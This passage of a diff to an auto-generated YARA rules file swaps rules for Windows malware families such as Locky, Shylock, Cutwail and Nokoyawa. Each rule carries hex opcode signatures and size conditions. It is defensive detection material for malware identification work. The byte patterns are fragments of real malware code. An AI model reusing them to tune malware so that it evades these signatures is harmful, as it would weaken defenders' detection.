-		$sequence_3 = { 3b4e04 7411 57 8bf8 }
-		$sequence_4 = { 8b9df0efffff 2b7008 037004 6a00 8b049d50914200 5b f644010480 }
-		$sequence_5 = { e9???????? 8365e500 8d45e4 6a0a 50 57 }
-		$sequence_6 = { 8b5584 0500040000 41 3bc2 76f6 8bf1 }
-		$sequence_7 = { 83c410 8b048550914200 3b740128 0f85b9010000 3b54012c 0f85af010000 }
-		$sequence_8 = { e8???????? 83c430 3c01 0f8584000000 83ec18 }
-		$sequence_9 = { 85c0 757c 837dec00 7476 8b55f4 8b049550914200 f644180448 }
+		$sequence_0 = { 8b4514 8b35???????? 50 ff15???????? e9???????? 6804010000 e8???????? }
+		$sequence_1 = { 03c3 5f 894d04 895508 89450c 5e 5d }
+		$sequence_2 = { 53 56 57 6804010000 e8???????? 8b7c241c 8bd8 }
+		$sequence_3 = { 83c640 83c740 3bf5 7ce6 8b4c2418 33c0 eb02 }
+		$sequence_4 = { 8d842430010000 50 33f6 ffd7 85c0 7e26 8a843430010000 }
+		$sequence_5 = { 8a46ff 83e03f 41 4f 8a907c520110 8851ff }
+		$sequence_6 = { 55 8b2d???????? 56 57 6804010000 ffd5 8bf0 }
+		$sequence_7 = { 56 ffd7 8d4c241c 6a00 51 6a02 }
+		$sequence_8 = { 740a 3818 7406 ff15???????? b8???????? c3 }
+		$sequence_9 = { 8bd8 b93f000000 33c0 8bfb f3ab 66ab 83c404 }
 
 	condition:
-		7 of them and filesize < 373760
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Cutwail_Auto : FILE
+rule MALPEDIA_Win_Lcpdot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cbc2bf28-da14-5ea8-8af9-9a0a97c6e135"
+		id = "a81ecd6b-bd4a-5150-b889-dde71e2987e1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cutwail_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lcpdot_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "9ba6db86559b6188867d3264363e179bc81f3f3f5481bc0c2638242b1cc71cd8"
+		logic_hash = "d5b8eea547f6e9190b9bc0d0e04ea03ad2b12f2bfb6cbcdecca904cccb5849ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82443,40 +82430,39 @@ rule MALPEDIA_Win_Cutwail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f849d000000 ff7510 e8???????? 59 }
-		$sequence_1 = { eb14 8b55fc 0355f8 8955fc }
-		$sequence_2 = { 59 7506 891d???????? 53 57 }
-		$sequence_3 = { 833800 7511 837df800 7e0b }
-		$sequence_4 = { 6a66 8d8d90f1ffff e8???????? 03c3 }
-		$sequence_5 = { 57 ff755c 03c8 51 e8???????? }
-		$sequence_6 = { 895104 8b8550feffff c7400800c02004 6a00 6a00 }
-		$sequence_7 = { e8???????? 894604 8b4610 57 }
-		$sequence_8 = { 8bec 81ecc4010000 8d8570feffff 50 6802020000 e8???????? 85c0 }
-		$sequence_9 = { 51 e8???????? 83c410 8985ecfdffff }
-		$sequence_10 = { 1bc0 f7d0 234554 e9???????? }
-		$sequence_11 = { 6bc912 56 ff742428 8981feb71513 }
-		$sequence_12 = { 8b95e4fdffff 52 8d85f8fdffff 50 e8???????? 83c408 }
-		$sequence_13 = { 53 53 6a02 e8???????? 894558 }
-		$sequence_14 = { c7854cfeffff00000000 eb0f 8b954cfeffff 83c201 89954cfeffff 83bd4cfeffff03 0f8db5000000 }
-		$sequence_15 = { 0f8d23010000 6800020000 6a00 8d95f8fdffff 52 }
+		$sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 }
+		$sequence_1 = { 418bdc 4c89642438 4489642430 488d442430 }
+		$sequence_2 = { 8bf1 889d14fcffff e8???????? 8d4620 83c40c 8d5002 }
+		$sequence_3 = { c78560fbffff4b4c6763 c78564fbffff66975c5f c78568fbffff8d676a9b c7856cfbffff5254774f c78570fbffff51724647 c78574fbffff5d9293ab }
+		$sequence_4 = { 742b 488d153c300100 eb15 48ffc9 741d 448b4338 }
+		$sequence_5 = { 52 ff15???????? 8b85f0efffff 8b8de8efffff 8b5604 6a00 6a00 }
+		$sequence_6 = { e8???????? 85c0 745f 8b8db4fbffff 85c9 7e23 8b85b8fbffff }
+		$sequence_7 = { ff15???????? 85c0 7468 33d2 68fe010000 }
+		$sequence_8 = { 741e 448b4638 4585c0 7415 488d1537380100 488d8c2440020000 }
+		$sequence_9 = { 8b542460 41bb00020000 4c8d0dc990ffff 458a20 4584e4 }
+		$sequence_10 = { 8975c8 c745dc38634100 ff15???????? 6a00 56 }
+		$sequence_11 = { e9???????? 488bd3 b940000000 4889ac24a8080000 }
+		$sequence_12 = { c74594c17e92d8 c74598a0b6d79f c7459cb6e6b8cb c745a0e5b6cad0 c745a4d0def5f5 c745a8faf2f2f7 }
+		$sequence_13 = { 468d2cb500000000 41f7ed 448bda 41c1fb05 }
+		$sequence_14 = { 52 8d041f 50 e8???????? 8b861c080000 83c418 03c7 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 257024
 }
-rule MALPEDIA_Win_Greenshaitan_Auto : FILE
+rule MALPEDIA_Win_Blister_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14595aea-9f28-5e60-9b87-81d296b006da"
+		id = "fe50a609-9d69-50d8-9407-cc1bb662c99e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.greenshaitan_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blister_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "1f6063ccf28ef721dc1c6c4df5a5fddba54c56e2e1ec3d58cf26082647681dea"
-		score = 75
-		quality = 75
+		logic_hash = "bbff3501a1abd67d694ed63bda3afb810ae6150a68deb6d717b382978b46ad0d"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82488,32 +82474,32 @@ rule MALPEDIA_Win_Greenshaitan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442434 64a300000000 8b6c2444 33db 895c2410 c744242c0f000000 895c2428 }
-		$sequence_1 = { 6a02 68???????? 8d842494000000 e8???????? }
-		$sequence_2 = { 895c244c 668944243c 3974246c 720d 8b4c2458 51 e8???????? }
-		$sequence_3 = { 7594 8b7c2414 83ff01 7534 }
-		$sequence_4 = { ff15???????? 8d442404 c746180f000000 c7461400000000 c6460400 8d5001 8a08 }
-		$sequence_5 = { 3974246c 720d 8b4c2458 51 e8???????? 83c404 8b542430 }
-		$sequence_6 = { 56 e8???????? 56 8bd8 e8???????? 8be8 8b4734 }
-		$sequence_7 = { c74424480f000000 895c2444 885c2434 eb1b 837d6810 7205 8b4554 }
-		$sequence_8 = { 53 890a e8???????? 55 e8???????? 83c408 }
-		$sequence_9 = { 8bf1 8b4814 c744240800000000 7214 8b4004 51 8bd8 }
+		$sequence_0 = { 53 8b5d10 56 8b750c 57 33ff 6a02 }
+		$sequence_1 = { 50 c745c03c000000 c745c400020000 c745cce4301717 c745dc05000000 ff15???????? }
+		$sequence_2 = { 7507 bf0e000780 eb34 8365f400 ff750c 33c0 }
+		$sequence_3 = { 7d06 33c0 33ff eb03 8b45f4 8945fc }
+		$sequence_4 = { 50 8d8584fcffff 50 ffb580fcffff 8d856cfcffff ffb578fcffff 50 }
+		$sequence_5 = { ff32 ff15???????? 83f8ff 7507 b805400080 eb02 33c0 }
+		$sequence_6 = { ff7508 6813100000 ff36 ffd7 6a03 58 8945d4 }
+		$sequence_7 = { e8???????? 57 8bce 894508 e8???????? 5f 5e }
+		$sequence_8 = { 85f6 7507 b857000780 eb45 832600 6a38 8d45c8 }
+		$sequence_9 = { e8???????? 8bce e8???????? 8bd8 85db 7d0f }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 1822720
 }
-rule MALPEDIA_Win_Socksbot_Auto : FILE
+rule MALPEDIA_Win_Exaramel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "faec2b10-b495-5749-b587-f624aaef83b1"
+		id = "9d8ef319-a5df-534f-b138-19485cbaf19b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socksbot_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.exaramel_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "369cd58dedba09e8aa40e9db282016f7a46ee224d612c8da35e03725828fb9df"
+		logic_hash = "0034b5ba03392faf6ba4ea9ba70e440d6025311290e39d869c6ea3fe5bf2d84b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82527,71 +82513,78 @@ rule MALPEDIA_Win_Socksbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a0d 50 8945fc e8???????? 8bf8 }
-		$sequence_1 = { 8d85acfeffff 50 51 c785acfeffff01000000 899db0feffff 894df0 c745f400879303 }
-		$sequence_2 = { 33c0 5f c9 c20400 55 8bec 81ec0c030000 }
-		$sequence_3 = { 324415bc 320439 32c3 880439 }
-		$sequence_4 = { 33c1 c1e002 33c1 c1e002 }
-		$sequence_5 = { c3 8b400c 8b00 ff30 ff15???????? 85c0 74eb }
-		$sequence_6 = { 03f3 eb6d 8b460c 03c3 }
-		$sequence_7 = { 8b55f8 43 8802 8b35???????? 33c0 3bdf }
-		$sequence_8 = { 880e 4a 75f7 5f 5e 5d c3 }
-		$sequence_9 = { a3???????? c605????????00 5b c9 c3 }
+		$sequence_0 = { 85c0 7539 a3???????? c705????????01000000 ff15???????? 8b35???????? 68???????? }
+		$sequence_1 = { be05400080 e9???????? 8d8528f8ffff 57 50 }
+		$sequence_2 = { ff15???????? 85c0 746d 53 57 ff75fc 8b3d???????? }
+		$sequence_3 = { 8b1d???????? 660f1f440000 8b0d???????? 8d85e4fbffff 6aff 6a00 }
+		$sequence_4 = { 742b 8b01 8d55f8 52 51 8b4068 ffd0 }
+		$sequence_5 = { e8???????? c70021000000 e9???????? 894ddc c745e068a54100 e9???????? c745e064a54100 }
+		$sequence_6 = { c1f806 6bc930 8b048560dd4100 f644082801 7406 8b440818 5d }
+		$sequence_7 = { 744e 85f6 7504 33c0 eb18 56 6a00 }
+		$sequence_8 = { 57 e8???????? 8bf0 83c428 85f6 0f881c010000 }
+		$sequence_9 = { 33c0 668945e8 8b45d4 886de5 8b148560dd4100 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Acidbox_Auto : FILE
+rule MALPEDIA_Win_Locky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e7057136-2c24-5d9e-851b-e4da203a95ed"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acidbox_auto.yar#L1-L131"
+		id = "9434ac8a-f19d-5097-9718-4e0bcd7c3bb7"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.locky_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "b9bd6906be69a76719ed536d0340b9bf2024c75961d5ef4e84e1394f2a4d90af"
+		logic_hash = "cfd0780ce81a27b30c6ff7ba29e871c926663b6bd8e9b266836319c43aec3bb1"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 89442430 85c0 0f841a010000 }
-		$sequence_1 = { 33d2 e9???????? 41c1ee04 33d2 83c6fc 418bce 83e10f }
-		$sequence_2 = { 488bce e8???????? 397e18 750b 834b40ff 33c0 e9???????? }
-		$sequence_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
-		$sequence_4 = { 4883ec58 488bf1 bf01200480 8978a8 33db 48895818 448bf3 }
-		$sequence_5 = { e8???????? 3b4704 7513 4d897500 8b4708 33db 418907 }
-		$sequence_6 = { 4d85f6 741a 33d2 41b880010000 498bce ff15???????? 498bce }
-		$sequence_7 = { 488b7128 4885ff 0f84e1000000 4885f6 0f84d8000000 488d8424c0000000 4889442420 }
-		$sequence_8 = { 81790800000306 7308 418bc6 e9???????? 488d842418010000 4889442420 41b9a0000000 }
-		$sequence_9 = { 897918 488b03 488b8898000000 89791c 488b03 488b8898000000 c7413809000000 }
+		$sequence_0 = { 51 51 8b00 6a00 8d4d0c 51 ff750c }
+		$sequence_1 = { 760a 68???????? e8???????? a1???????? 2b05???????? 6a1c }
+		$sequence_2 = { 50 c745f8???????? e8???????? 8d85f0fdffff 50 }
+		$sequence_3 = { 99 83e207 8d3c02 33d2 42 c1ff03 663bca }
+		$sequence_4 = { 99 5e f7fe 8bf0 81fe48922409 760a 68???????? }
+		$sequence_5 = { 6a00 ff15???????? 85c0 751e ff15???????? c745f8???????? }
+		$sequence_6 = { 8907 8bc7 c9 c20400 ff15???????? 8945fc }
+		$sequence_7 = { 7314 8b4e1c 8b431c 3bc8 7c0a }
+		$sequence_8 = { 5b c21000 e9???????? 8bff 55 8bec 56 }
+		$sequence_9 = { 03d8 8b442408 f7e1 03d3 5b c21000 e9???????? }
+		$sequence_10 = { 66ab e9???????? 8d12 e9???????? }
+		$sequence_11 = { ebcf 90 8d36 90 }
+		$sequence_12 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 }
+		$sequence_13 = { 6a61 e9???????? 90 58 }
+		$sequence_14 = { 6a63 e9???????? 90 8d36 }
+		$sequence_15 = { 66ab e9???????? 58 90 e9???????? 90 }
+		$sequence_16 = { 66ab 90 e9???????? 8d00 }
 
 	condition:
-		7 of them and filesize < 589824
+		7 of them and filesize < 1122304
 }
-rule MALPEDIA_Win_Colibri_Auto : FILE
+rule MALPEDIA_Win_Yarat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c5670290-4724-5847-ad87-e4a198921e3b"
+		id = "c5e6c743-0bb4-5ded-85f6-7e273a746dba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.colibri_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yarat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "07fa90a8bd47a0724796f8c6b0b275796c3daebded1dd7bb4e8069ed71142d39"
+		logic_hash = "9bcd9db0a35387b5ff289ffde342821469357bc27585eec725313cf57fac8b79"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82605,32 +82598,32 @@ rule MALPEDIA_Win_Colibri_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8598fdffff 6804010000 50 6a02 59 }
-		$sequence_1 = { 50 6a02 59 e8???????? babab69c31 8bc8 }
-		$sequence_2 = { a1???????? 81ec90080000 53 56 57 8d0c4502000000 e8???????? }
-		$sequence_3 = { 59 e8???????? ba980aa4bf 8bc8 e8???????? ffd0 8945ec }
-		$sequence_4 = { 8b4dd0 8d144502000000 e8???????? a1???????? 8b4dcc 8d144502000000 e8???????? }
-		$sequence_5 = { e8???????? 53 8bf0 56 6aff 57 6a00 }
-		$sequence_6 = { 8365f800 50 e8???????? 59 85c0 7413 8b4dfc }
-		$sequence_7 = { ffd0 e8???????? 8b75d0 85c0 }
-		$sequence_8 = { 8945fc b944000000 b000 8b7dfc }
-		$sequence_9 = { 50 68e9fd0000 6a02 59 e8???????? bac0bc4316 8bc8 }
+		$sequence_0 = { 8b07 51 03f0 52 56 e8???????? 8b8564feffff }
+		$sequence_1 = { 8b7d08 33f6 33db 85ff 7439 8bf7 8d4e01 }
+		$sequence_2 = { c1ca03 663bf5 84eb 81f21b6f5a16 f7da f5 81fede018b2e }
+		$sequence_3 = { 8b3f 85ff 75d7 837c241c00 8b3d???????? 754f 6804010000 }
+		$sequence_4 = { f5 81c702000000 6685f1 0fadc2 f6d0 0f42c5 0fc8 }
+		$sequence_5 = { b90a000000 5f 5e 89889c0a0000 8bc3 5b 8be5 }
+		$sequence_6 = { e8???????? 83c408 eb02 33c0 898388050000 80be3e10000000 8945f8 }
+		$sequence_7 = { 8bec 8b4d08 85c9 7413 8b8148050000 8b4024 85c0 }
+		$sequence_8 = { e8???????? 8bc6 83c418 0b45e8 0f858d000000 eb78 6a02 }
+		$sequence_9 = { 869d56f9247d 9e 2490 7f7c ec 96 ac }
 
 	condition:
-		7 of them and filesize < 51200
+		7 of them and filesize < 8692736
 }
-rule MALPEDIA_Win_Scranos_Auto : FILE
+rule MALPEDIA_Win_Ismdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6b87374-5f91-5170-a53f-357b78008c92"
+		id = "540e8392-0220-5703-98ef-e8f75cf1cca1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scranos_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ismdoor_auto.yar#L1-L153"
 		license_url = "N/A"
-		logic_hash = "52e1cc52ba176c72c7453bb67f5d2aeb347a2cda714eb2419f457836d51a180e"
+		logic_hash = "0347b8b3605f80aa046ee397578be54423bd20b2d0f0c466e85204c8c4819aa8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82644,32 +82637,37 @@ rule MALPEDIA_Win_Scranos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8d4dd0 e9???????? 8d8d64ffffff e9???????? b8???????? e9???????? }
-		$sequence_1 = { c68424450e00002d 8db424460e0000 f6c102 7406 c6062b 83c601 f6c101 }
-		$sequence_2 = { c745a800000000 837d9c00 7508 8b45a0 8b08 894d9c 8b55f4 }
-		$sequence_3 = { e8???????? 83c404 85c0 0f8587050000 39442424 0f8570050000 8b8d940c0000 }
-		$sequence_4 = { c745b07c441010 e8???????? cc 6a44 b8???????? e8???????? 68???????? }
-		$sequence_5 = { 8d6803 e8???????? 83c40c 85c0 0f85c4000000 6a07 56 }
-		$sequence_6 = { 8b5518 8991e0010000 c745f800000000 eb09 8b45f8 83c001 8945f8 }
-		$sequence_7 = { c6405400 0fb64dff 85c9 7514 8b55e4 8b45ec 3b424c }
-		$sequence_8 = { 90 8d442410 50 6a00 55 56 e8???????? }
-		$sequence_9 = { c7414802000000 8b55e8 52 e8???????? 83c404 83c001 8945b0 }
+		$sequence_0 = { 83f8ff 7504 32c0 eb05 c0e804 2401 84c0 }
+		$sequence_1 = { 488bd6 488bcb ff5048 4885c0 750e }
+		$sequence_2 = { 7419 488d4dc0 e8???????? 483bd8 7405 }
+		$sequence_3 = { 448bc3 4963c0 4585c0 7514 }
+		$sequence_4 = { 90 c685200100006b 4c89bd38010000 4c89bd40010000 48c7854001000007000000 }
+		$sequence_5 = { 488d4c2448 e8???????? 90 4c8d45f0 488bd0 }
+		$sequence_6 = { 488b45b8 48898310020000 48898318020000 48898320020000 }
+		$sequence_7 = { e9???????? 4532ed 488d8db0010000 e8???????? }
+		$sequence_8 = { eb02 33c0 8bbdccfbffff 6bc009 0fb6bc38107a4700 8bc7 }
+		$sequence_9 = { e8???????? 83f8ff 7e3c ff75ec }
+		$sequence_10 = { 52 50 e8???????? 68e8030000 ffd6 }
+		$sequence_11 = { c645fc3f e9???????? 6a00 68???????? }
+		$sequence_12 = { c785f0fdffff00000000 50 6a00 6a00 6a1d 8bf1 }
+		$sequence_13 = { 46 83fe10 7cdb ff75d0 8d55e8 }
+		$sequence_14 = { 8bc8 eb0c 0fb6c0 0fbe8040714800 03c8 }
 
 	condition:
-		7 of them and filesize < 2859008
+		7 of them and filesize < 1933312
 }
-rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
+rule MALPEDIA_Win_Taleret_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b4746bef-c0ea-5bd8-a0d8-b1e69c784457"
+		id = "09104a61-10e4-51be-8fcd-72ca4b899ef9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cur1_downloader_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taleret_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "75283ba2057f95c8da3348505d3be061064c40e196de82d8a3f46a329333d71b"
+		logic_hash = "4f3dbb090232b14fe9d8fb1c04016f4bef98cd25096fea3fc24c423d5e08c994"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82683,32 +82681,32 @@ rule MALPEDIA_Win_Cur1_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d41ff 8b8482c81a0200 85c0 0f84c6000000 413bc7 }
-		$sequence_1 = { 8b4c2450 e8???????? 4889442458 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 }
-		$sequence_2 = { 83e10f 480fbe841100e40100 8a8c1110e40100 4c2bc0 418b40fc d3e8 }
-		$sequence_3 = { 4863442420 4533c0 0fb6540424 488d0d8da60200 e8???????? 48634c2420 88440c24 }
-		$sequence_4 = { 488bbc24e0000000 4803fa 488bd7 8b7c2440 486bff0c 488d35aa980200 4803f7 }
-		$sequence_5 = { 4533c9 4533c0 488d542438 488b8c24d8000000 }
-		$sequence_6 = { b843000000 6689842486000000 b875000000 6689842488000000 b872000000 668984248a000000 b872000000 }
-		$sequence_7 = { 4885c0 751e 498bc6 4c8d3d9f39ffff }
-		$sequence_8 = { c744242001000000 4533c9 4533c0 488d942420170000 33c9 ff15???????? 89442468 }
-		$sequence_9 = { 4889442478 488b4c2430 488b542420 4803d1 488bca e8???????? 488b4c2478 }
+		$sequence_0 = { 89442430 8bf8 8bc1 8bf5 55 c1e902 f3a5 }
+		$sequence_1 = { 85c0 741b 8b4c241c 51 ffd3 8b542410 }
+		$sequence_2 = { 51 68???????? 52 e8???????? 50 8d4c2414 c644243802 }
+		$sequence_3 = { 8d4c242c c78424a8030000ffffffff e8???????? 56 e8???????? 83c404 8b7c2410 }
+		$sequence_4 = { 85ff 896c2420 7e2a 8b4c2440 8d442420 }
+		$sequence_5 = { 85c0 0f84a6000000 50 51 }
+		$sequence_6 = { 50 e8???????? 8d8eb0010000 8d542434 51 68???????? 52 }
+		$sequence_7 = { 51 ffd6 85c0 7536 ff15???????? 83f87a }
+		$sequence_8 = { ff15???????? 8bd8 3bde 895c2420 750d 5f }
+		$sequence_9 = { 8b4c2424 c644310100 8d4c2430 e8???????? 50 }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Crenufs_Auto : FILE
+rule MALPEDIA_Win_Shylock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "487ba1c7-31dd-5f61-bb00-5c9d73db857b"
+		id = "27b4846a-398c-5add-a760-ff7339bbdf8b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crenufs_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shylock_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "b8d4f6abd83faf05e3956845ba58bcd09d9f7c4a785dc9758948905ec6301e11"
+		logic_hash = "742cfb0b5b4c0d8c9d0f24db70f112e2bfd101bfeb4b4efca74ae8b027c1a20b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82722,32 +82720,32 @@ rule MALPEDIA_Win_Crenufs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 8d4de4 ff15???????? 8b4df4 5f 5e 5b }
-		$sequence_1 = { 8b7610 c744241000000000 3930 770a }
-		$sequence_2 = { 50 56 8d4de0 ff15???????? 57 68???????? }
-		$sequence_3 = { 8bf9 56 897c2418 e8???????? 56 ff15???????? }
-		$sequence_4 = { c7461001000000 8bde ff15???????? 392d???????? 7512 8935???????? 892e }
-		$sequence_5 = { 52 8d7e58 6a04 57 50 ffd5 }
-		$sequence_6 = { 03ca 894c2438 3b4b18 740d 8b4c2454 c74118ccc74000 eb61 }
-		$sequence_7 = { ff15???????? 834dfcff 6a01 8d4ddc ff15???????? 8b4df4 8bc6 }
-		$sequence_8 = { 53 50 68???????? 53 ff15???????? 6a01 8d4db0 }
-		$sequence_9 = { ff15???????? e9???????? a1???????? bf???????? 83c9ff }
+		$sequence_0 = { e8???????? eb75 8d75d0 e8???????? 8d75a4 e8???????? 8d75c4 }
+		$sequence_1 = { c20800 55 8bec 83ec1c 56 8d45ec 57 }
+		$sequence_2 = { ff75e0 e8???????? 83c410 33c0 eb0c b857000780 eb05 }
+		$sequence_3 = { ff75b8 53 e8???????? 83c420 85c0 7439 3975fc }
+		$sequence_4 = { e8???????? 59 85c0 751a e8???????? 3db7000000 740e }
+		$sequence_5 = { e8???????? 59 50 ff750c ff7508 e8???????? 8d751c }
+		$sequence_6 = { ff75f8 e8???????? 8d45f0 50 8bc6 8b7508 50 }
+		$sequence_7 = { 8d75fc e8???????? 6a00 68???????? 8d5d0c e8???????? 6a00 }
+		$sequence_8 = { eb06 8b4d20 8d3488 e8???????? 8b75f0 8d7ddc e8???????? }
+		$sequence_9 = { ff75f0 e8???????? 8b5d0c 8d45d0 50 e8???????? 8bd8 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Petrwrap_Auto : FILE
+rule MALPEDIA_Win_Nokoyawa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4231d0f2-bcca-5065-a819-dce30768f04e"
+		id = "5fa67854-5271-511e-bc7c-fd346224ae86"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.petrwrap_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa"
